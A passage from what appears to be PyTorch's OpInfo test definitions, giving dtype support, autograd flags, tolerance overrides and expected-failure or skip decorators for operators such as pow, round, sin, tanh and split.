'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,),) )), OpInfo('dist', op=torch.dist, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), supports_out=False, supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_dist), OpInfo('outer', op=torch.outer, aliases=('ger', ), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_outer,), OpInfo('ormqr', op=torch.ormqr, dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_ormqr, error_inputs_func=error_inputs_ormqr, decorators=[skipCUDAIfNoCusolver, skipCPUIfNoLapack], skips=( # ormqr does not support forward when complex inputs require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), )), OpInfo('permute', ref=np.transpose, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, assert_autodiffed=True, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_permute, reference_inputs_func=reference_inputs_permute), BinaryUfuncInfo('pow', dtypes=all_types_and_complex_and(torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), ref=np.power, # Due to AVX2 curently not being fully supported for Float16, log_vml_cpu can't be enabled # for Float16, causing this test to fail. pow's autograd for Float16 is thus currently # unsupported on CPU. backward_dtypes=floating_and_complex_types_and(torch.bfloat16), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.bfloat16, torch.half, torch.chalf), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, supports_one_python_scalar=True, # Integer types do not support negative exponentes rhs_make_tensor_kwargs=dict(low=0), # Raising negative real numbers to fractional powers is not supported lhs_make_tensor_kwargs=dict(low=0), decorators=( DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-4, rtol=1.3e-05)}), 'TestBinaryUfuncs', 'test_reference_numerics'), DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-4, rtol=1.3e-05), torch.complex128: tol(atol=1e-4, rtol=1.3e-05)}), 'TestBinaryUfuncs', 'test_scalar_support'), ), skips=( # Skipping integers because they are being raised to negative powers causing an error DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=[torch.int8, torch.int16, torch.int32, torch.int64]), DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_reference_numerics_large_values', dtypes=[torch.int16, torch.int32, torch.int64]), # FIXME Complex values error with: Greatest absolute difference: nan at index # Ref: https://github.com/pytorch/pytorch/issues/76853 # For `chalf`, reference computation in `numpy` is computed in `cfloat`. # Output of `chalf` saturates to `inf` quicker than reference due to its small range # which leads to failure of this test. DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.complex32,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.complex32, torch.complex64, torch.complex128)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_large_values', dtypes=(torch.complex32, torch.complex64, torch.complex128)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values', dtypes=(torch.complex32, torch.complex64, torch.complex128)), )), BinaryUfuncInfo('float_power', ref=np.float_power, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.bool), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_one_python_scalar=True, # Integer types do not support negative exponentes rhs_make_tensor_kwargs=dict(low=0), # Raising negative real numbers to fractional powers is not supported lhs_make_tensor_kwargs=dict(low=0), decorators=( DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-4, rtol=1.3e-05), torch.complex128: tol(atol=1e-4, rtol=1.3e-05)}), 'TestBinaryUfuncs', 'test_scalar_support'), ), skips=( # FIXME # AssertionError: Object comparison failed: torch.float64 != torch.float32 DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), # -3.43399e+38 is outside the range of representable values of type 'float' DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Complex values error with: Greatest absolute difference: nan at index DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=[torch.complex64, torch.complex128]), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_large_values', dtypes=[torch.complex64, torch.complex128]), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values', dtypes=[torch.complex64, torch.complex128]), )), OpInfo('qr', op=torch.qr, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_qr_geqrf, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # In-place ops check_batched_gradgrad=False, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), UnaryUfuncInfo('rad2deg', ref=np.degrees, decorators=(precisionOverride({torch.bfloat16: 7e-1, torch.float16: 7e-1}),), dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), skips=( # Reference: https://github.com/pytorch/pytorch/pull/51283#issuecomment-770614273 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16]), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('real', ref=np.real, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( # Skip since real and imag don't have out variants. DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_out_arg_all_dtypes'), )), OpInfo( "roll", ref=np.roll, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), error_inputs_func=error_inputs_roll, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_roll, decorators=(onlyNativeDeviceTypes,), ), OpInfo( "rot90", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), error_inputs_func=error_inputs_rot90, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_rot90, ), # To test reference numerics against multiple values of argument `decimals`, # we make multiple OpInfo entries with each entry corresponding to different value of decimals. UnaryUfuncInfo('round', ref=np.round, aliases=('special.round',), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True,), UnaryUfuncInfo('round', ref=np.round, variant_test_name='decimals_0', aliases=('special.round',), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_kwargs=lambda device, dtype, input: ({'decimals': 0}, {'decimals': 0}), sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'decimals': 0}), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_sparse_csr=False), UnaryUfuncInfo('round', ref=np.round, variant_test_name='decimals_3', aliases=('special.round',), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_kwargs=lambda device, dtype, input: ({'decimals': 3}, {'decimals': 3}), sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'decimals': 3}), skips=( # test_ops already tested for this overload with `decimals_0` opinfo entry DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits'), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_sparse_csr=False), UnaryUfuncInfo('round', ref=np.round, variant_test_name='decimals_neg_3', aliases=('special.round',), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_kwargs=lambda device, dtype, input: ({'decimals': -3}, {'decimals': -3}), sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'decimals': -3}), skips=( # test_ops already tested for this overload with `decimals_0` opinfo entry DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits'), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_sparse_csr=False), UnaryUfuncInfo('sin', ref=np.sin, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16), # TODO: Add torch.chalf backward dtype support. Currently, we get: # AssertionError: The supported dtypes for sin on device type cuda are incorrect! # The following dtypes did not work in backward but are listed by the OpInfo: {torch.complex32}. backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), assert_autodiffed=True, handles_large_floats=False, supports_sparse=True, supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Fails on CUDA but passes on ROCm DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cdouble,), device_type='cuda'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=(torch.cfloat, torch.cdouble,), device_type='cpu', active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cfloat, torch.cdouble,), device_type='cpu', active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), ), decorators=(precisionOverride({torch.bfloat16: 1e-2}),)), UnaryUfuncInfo('sinc', ref=np_sinc_with_fp16_as_fp32, aliases=('special.sinc',), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), handles_large_floats=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 1e-2, torch.float16: 1e-2}),), skips=( # Reference: https://github.com/pytorch/pytorch/issues/49133 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.cfloat]), )), UnaryUfuncInfo('sinh', ref=np_unary_ufunc_integer_promotion_wrapper(np.sinh), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, decorators=(precisionOverride({torch.float16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cdouble,)), # Reference: https://github.com/pytorch/pytorch/issues/48641 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.int8]), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), )), UnaryUfuncInfo('sign', ref=reference_sign, dtypes=all_types_and(torch.bool, torch.bfloat16, torch.half), dtypesIfCUDA=all_types_and(torch.bool, torch.bfloat16, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/41245 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16, torch.float16, torch.float32, torch.float64]), )), UnaryUfuncInfo('sgn', ref=reference_sgn, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), backward_dtypes=floating_and_complex_types_and(torch.bfloat16, torch.half), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.bfloat16, torch.half, torch.chalf), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/41245 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16, torch.float16, torch.float32, torch.float64]), # Reference: https://github.com/pytorch/pytorch/issues/53958 # Test fails in comparison on Nan as the `equal_nan` is True for # comparing the CPU tensors. DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.complex64, torch.complex128]), # Reference: https://github.com/pytorch/pytorch/issues/48486 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.complex64]), # The complex formula might be wrong DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', dtypes=complex_types()), # Passes for float, but for complex - Need: _s_where DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=complex_types()), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_inplace_forward_mode_AD', dtypes=complex_types()), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # add_out_op2_sparse_csr DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), )), OpInfo('split', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool, torch.chalf), sample_inputs_func=partial(sample_inputs_split, list_args=False), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused assert_autodiffed=True), OpInfo('split', # Cannot declare this aten_name because of # test_variant_consistency_jit_split_list_args_cpu_float32 decomp_aten_name='split_with_sizes', variant_test_name='list_args', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), sample_inputs_func=partial(sample_inputs_split, list_args=True), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('split_with_sizes', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool, torch.chalf), sample_inputs_func=sample_inputs_split_with_sizes, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True), BinaryUfuncInfo('__radd__', op=torch.Tensor.__radd__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=['aten::add'],), BinaryUfuncInfo('__rdiv__', op=torch.Tensor.__rdiv__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), promotes_int_to_float=True, lhs_make_tensor_kwargs={'exclude_zero': True}, supports_out=False, skips=( # https://github.com/pytorch/pytorch/issues/76806 DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, autodiff_nonfusible_nodes=['aten::mul', 'aten::reciprocal'],), BinaryUfuncInfo('__rmul__', op=torch.Tensor.__rmul__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=['aten::mul'],), BinaryUfuncInfo('__rand__', op=torch.Tensor.__rand__, dtypes=integral_types_and(torch.bool), supports_out=False, supports_autograd=False, supports_forward_ad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), BinaryUfuncInfo('__ror__', op=torch.Tensor.__ror__, dtypes=integral_types_and(torch.bool), supports_out=False, supports_autograd=False, supports_forward_ad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), BinaryUfuncInfo('__rxor__', op=torch.Tensor.__rxor__, dtypes=integral_types_and(torch.bool), supports_out=False, supports_autograd=False, supports_forward_ad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), OpInfo('__rmatmul__', op=torch.Tensor.__rmatmul__, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), assert_autodiffed=True, sample_inputs_func=sample_inputs_matmul, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, decorators=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}), 'TestMathBits', 'test_conj_view'), DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-05, rtol=1.2e-03)}), 'TestCommon', 'test_noncontiguous_samples'), ), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), # https://github.com/pytorch/pytorch/issues/67470 DecorateInfo(unittest.skip("67470!"), 'TestCommon', 'test_noncontiguous_samples', device_type='cpu', dtypes=(torch.long,)), # Fails on XLA. # AssertionError: False is not true : Tensors failed to compare as equal DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), # https://github.com/pytorch/pytorch/issues/71774 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.long,)), )), BinaryUfuncInfo('__rmod__', op=torch.Tensor.__rmod__, dtypes=floating_types_and(torch.bfloat16, torch.half,), dtypesIfCUDA=all_types_and(torch.bfloat16, torch.half), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), # Support autograd after torch.remainder(Tensor, Tensor) supports # autograd of the second argument. # https://github.com/pytorch/pytorch/pull/58476/files#r637167630 # supports_autograd=False, assert_autodiffed=True, autodiff_nonfusible_nodes=['aten::remainder'],), BinaryUfuncInfo('__rpow__', op=torch.Tensor.__rpow__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half), # Reference: https://github.com/pytorch/pytorch/issues/54774 # "log2" "_vml_cpu" not implemented for Half backward_dtypes=all_types_and_complex_and(torch.bfloat16), backward_dtypesIfCUDA=all_types_and_complex_and(torch.bfloat16, torch.half), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), # TODO: FIXME tolerance is too high DecorateInfo(unittest.skip('Skipped!'), 'TestGradients'), ), assert_autodiffed=True, autodiff_nonfusible_nodes=['aten::pow'],), BinaryUfuncInfo('__rsub__', op=torch.Tensor.__rsub__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, supports_two_python_scalars=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), assert_autodiffed=True, autodiff_nonfusible_nodes=['aten::rsub'],), BinaryUfuncInfo('rsub', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, supports_inplace_autograd=False, assert_autodiffed=None, sample_inputs_func=sample_inputs_add_sub), OpInfo('select', aten_backward_name='select_backward', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool, torch.chalf), sample_inputs_func=sample_inputs_select, assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('select_scatter', dtypes=all_types_and(torch.bfloat16, torch.half, torch.bool), sample_inputs_func=sample_inputs_select_scatter, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('slice_scatter', dtypes=all_types_and(torch.bfloat16, torch.half, torch.bool), sample_inputs_func=sample_inputs_slice_scatter, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo('signbit', ref=np.signbit, dtypes=all_types_and(torch.bool, torch.bfloat16, torch.half), supports_sparse=True, supports_sparse_csr=True, supports_autograd=False,), UnaryUfuncInfo('tan', ref=np.tan, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.float64], active_if=TEST_WITH_ROCM), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # same reason as above DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # same reason as above DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), ), # tan(pi/2 * odd_number) is nan reference_numerics_filter=NumericsFilter( condition=lambda x: close_to_int(x / (math.pi * 0.5)), safe_val=math.pi)), UnaryUfuncInfo('tanh', ref=np.tanh, aten_backward_name='tanh_backward', aliases=('nn.functional.tanh',), decorators=(precisionOverride({torch.bfloat16: 1e-2}),), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), # alias, nn.functional.tanh, will produce (because of warning string saved): # "RuntimeError: Expected to not find "tanh" but found it" DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), ), # tan(j * pi/2 * odd_number) is nan reference_numerics_filter=NumericsFilter( condition=lambda x: (close_to_int(x / (math.pi * 0.5j)) if x.is_complex() else x.new_tensor(False, dtype=torch.bool)), safe_val=0)), OpInfo('tensor_split', ref=np.array_split, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ), sample_inputs_func=sample_inputs_tensor_split,), OpInfo('hsplit', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_hsplit, error_inputs_func=error_inputs_hsplit,), OpInfo('vsplit', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_vsplit, error_inputs_func=error_inputs_vsplit,), OpInfo('dsplit', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_dsplit, error_inputs_func=error_inputs_dsplit,), OpInfo('triangular_solve', op=torch.triangular_solve, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_legacy_solve, check_batched_gradgrad=False, supports_forward_ad=True, 